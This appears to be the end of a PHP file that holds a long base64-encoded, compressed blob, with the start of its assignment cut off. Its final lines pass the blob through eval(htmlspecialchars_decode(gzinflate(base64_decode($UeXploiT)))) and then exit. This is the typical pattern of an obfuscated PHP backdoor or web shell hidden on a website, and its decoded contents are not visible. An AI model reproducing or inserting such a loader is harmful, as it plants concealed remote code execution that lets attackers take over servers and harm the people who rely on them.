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";
eval(htmlspecialchars_decode(gzinflate(base64_decode($UeXploiT))));
exit;
?>